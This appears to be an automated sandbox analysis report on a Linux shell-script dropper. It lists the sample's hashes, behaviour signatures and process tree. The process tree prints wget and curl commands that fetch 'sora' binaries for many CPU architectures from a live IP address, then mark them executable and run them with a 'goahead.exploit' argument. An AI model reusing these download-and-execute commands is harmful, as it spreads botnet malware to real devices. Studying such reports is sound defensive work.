Analysis
-
max time kernel
3s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
-
Size
2KB
-
MD5
ee0d49be644dae49f775256609f1218e
-
SHA1
036f36cd4a7dc0abe7ea6315e9f2524f35a6c73d
-
SHA256
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2
-
SHA512
1df66cf2794390f84d3c0e20e24991c720c852c38a3b1984e8c120d1310f492ffad43ae4248e72cbd00968ec4a3db753f4a748147ac2295ad7a83f46146374c8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1512 chmod 1567 chmod 1573 chmod 1500 chmod 1506 chmod 1549 chmod 1555 chmod 1561 chmod 1491 chmod 1537 chmod 1543 chmod 1519 chmod 1525 chmod 1531 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1492 robben /tmp/robben 1501 robben /tmp/robben 1507 robben /tmp/robben 1513 robben /tmp/robben 1520 robben /tmp/robben 1526 robben /tmp/robben 1532 robben /tmp/robben 1538 robben /tmp/robben 1544 robben /tmp/robben 1550 robben /tmp/robben 1556 robben /tmp/robben 1562 robben /tmp/robben 1568 robben /tmp/robben 1574 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1494 wget 1495 curl 1499 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Processes
-
/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh1⤵
- Writes file to tmp directory
PID:1487 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1488
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1489
-
-
/bin/catcat sora.x862⤵PID:1490
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1491
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1492
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1494
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1495
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1499
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1500
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1501
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1503
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1504
-
-
/bin/catcat sora.x86_642⤵PID:1505
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1507
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1509
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1510
-
-
/bin/catcat sora.i4682⤵PID:1511
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1513
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1515
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1517
-
-
/bin/catcat sora.i6862⤵PID:1518
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1520
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1523
-
-
/bin/catcat sora.mpsl2⤵PID:1524
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1526
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1528
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1529
-
-
/bin/catcat sora.arm42⤵PID:1530
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1532
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1534
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1535
-
-
/bin/catcat sora.arm52⤵PID:1536
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1540
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1541
-
-
/bin/catcat sora.arm62⤵PID:1542
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1544
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1546
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1547
-
-
/bin/catcat sora.arm72⤵PID:1548
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1553
-
-
/bin/catcat sora.ppc2⤵PID:1554
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1556
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1559
-
-
/bin/catcat sora.ppc440fp2⤵PID:1560
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1562
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1565
-
-
/bin/catcat sora.m68k2⤵PID:1566
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1568
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1570
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1571
-
-
/bin/catcat sora.sh42⤵PID:1572
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh config-err-TtKvLo netplan_vobrtjej robben snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-h5vBj42⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:1574
-